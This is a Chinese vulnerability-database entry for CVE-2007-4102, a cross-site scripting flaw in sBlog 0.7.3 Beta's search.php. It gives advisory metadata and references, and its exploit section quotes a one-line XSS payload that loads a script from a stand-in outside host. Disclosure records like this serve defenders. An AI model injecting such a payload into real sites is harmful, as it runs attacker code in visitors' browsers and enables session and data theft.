sBLOG Search.PHP 跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1189608 漏洞类型 跨站脚本
发布时间 2007-07-31 更新时间 2007-08-02
CVE编号 CVE-2007-4102 CNNVD-ID CNNVD-200707-567
漏洞平台 N/A CVSS评分 4.3
|漏洞来源
https://cxsecurity.com/issue/WLB-2007080009
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200707-567
|漏洞详情
sBlog0.7.3Beta的search.php中存在跨站脚本攻击漏洞。远程攻击者可以借助搜索字符串中的一个主要的'"/>序列,注入任意HTML和web脚步。
|漏洞EXP
# sBlog 0.7.3 Beta  XSS Vulnerabilitie
# Found by 0x90
# www.0x90.com.ar
# msn & mail: Guns (at) 0x90.com (dot) ar [email concealed]

# in blog
http://host/blog/search.php

# use

'"/></><script src=http://yoursite.com/evil.js>

# Welcome to the jungle!
|参考资料

来源:XF
名称:sblog-search-xss(35645)
链接:http://xforce.iss.net/xforce/xfdb/35645
来源:BID
名称:25098
链接:http://www.securityfocus.com/bid/25098
来源:BUGTRAQ
名称:20070726sBlog0.7.3BetaXSSVulnerabilitie
链接:http://www.securityfocus.com/archive/1/archive/1/474822/100/0/threaded
来源:SREASON
名称:2942
链接:http://securityreason.com/securityalert/2942